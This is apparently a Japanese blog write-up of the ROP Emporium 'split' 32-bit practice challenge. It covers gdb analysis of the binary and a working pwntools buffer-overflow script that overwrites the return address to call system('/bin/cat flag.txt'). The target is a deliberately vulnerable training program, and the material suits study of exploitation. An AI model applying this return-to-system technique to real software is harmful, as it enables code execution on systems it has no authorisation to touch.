ROP Emporium split (32bit)
ROP Emporium
ROP Emporium
ROPの練習サイトです.
2020年7月に更新されていろいろ変わってるみたい.
split (32bit)
$ ./split32 split by ROP Emporium x86 Contriving a reason to ask user for data... > aaaa Thank you! Exiting $ ./split32 split by ROP Emporium x86 Contriving a reason to ask user for data... > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Thank you! Segmentation fault
gdbで解析していきます.
$ gdb ./split32 gdb-peda$ i func All defined functions: Non-debugging symbols: 0x08048374 _init 0x080483b0 read@plt 0x080483c0 printf@plt 0x080483d0 puts@plt 0x080483e0 system@plt 0x080483f0 __libc_start_main@plt 0x08048400 setvbuf@plt 0x08048410 memset@plt 0x08048420 __gmon_start__@plt 0x08048430 _start 0x08048470 _dl_relocate_static_pie 0x08048480 __x86.get_pc_thunk.bx 0x08048490 deregister_tm_clones 0x080484d0 register_tm_clones 0x08048510 __do_global_dtors_aux 0x08048540 frame_dummy 0x08048546 main 0x080485ad pwnme 0x0804860c usefulFunction 0x08048630 __libc_csu_init 0x08048690 __libc_c
usefulFunction
を見てみます.
gdb-peda$ disas usefulFunction Dump of assembler code for function usefulFunction: 0x0804860c <+0>: push ebp 0x0804860d <+1>: mov ebp,esp 0x0804860f <+3>: sub esp,0x8 0x08048612 <+6>: sub esp,0xc 0x08048615 <+9>: push 0x804870e 0x0804861a <+14>: call 0x80483e0 <system@plt> 0x0804861f <+19>: add esp,0x10 0x08048622 <+22>: nop 0x08048623 <+23>: leave 0x08048624 <+24>: ret End of assembler dump. gdb-peda$ x/s 0x804870e 0x804870e: "/bin/ls"
system("/bin/ls")
するだけ.
他のシンボルを調べます.
gdb-peda$ i var All defined variables: Non-debugging symbols: 0x080486a8 _fp_hw 0x080486ac _IO_stdin_used 0x08048718 __GNU_EH_FRAME_HDR 0x08048894 __FRAME_END__ 0x08049f0c __frame_dummy_init_array_entry 0x08049f0c __init_array_start 0x08049f10 __do_global_dtors_aux_fini_array_entry 0x08049f10 __init_array_end 0x08049f14 _DYNAMIC 0x0804a000 _GLOBAL_OFFSET_TABLE_ 0x0804a028 __data_start 0x0804a028 data_start 0x0804a02c __dso_handle 0x0804a030 usefulString 0x0804a042 __bss_start 0x0804a042 _edata 0x0804a044 __TMC_END__ 0x0804a044 stdout 0x0804a044 stdout@@GLIBC_2.0 0x0804a048 completed 0x0804a04c _end
usefulString
を見てみます.
gdb-peda$ x/s 0x0804a030 0x804a030 <usefulString>: "/bin/cat flag.txt"
使えそうな文字列です.
main
とpwnme
はret2winと同じ. pwnme
でバッファオーバーフローが起こる. offsetは44.
ということでリターンアドレスを書き換えてsystem("/bin/cat flag.txt")
を実行します.
+--------------------+ | AAAA | +--------------------+ | system@plt | +--------------------+ | BBBB | +--------------------+ | usefulString | +--------------------+
(今回も必要ない気がするけど)スクリプトを書いた.
from pwn import * p=process('./split32') e=ELF('./split32') plt_system=e.plt['system'] usefulString=e.symbols['usefulString'] payload=b'A'*44 payload+=p32(plt_system) payload+=b'BBBB' payload+=p32(usefulString) p.recv() p.sendline(payload) print(p.recvall().decode())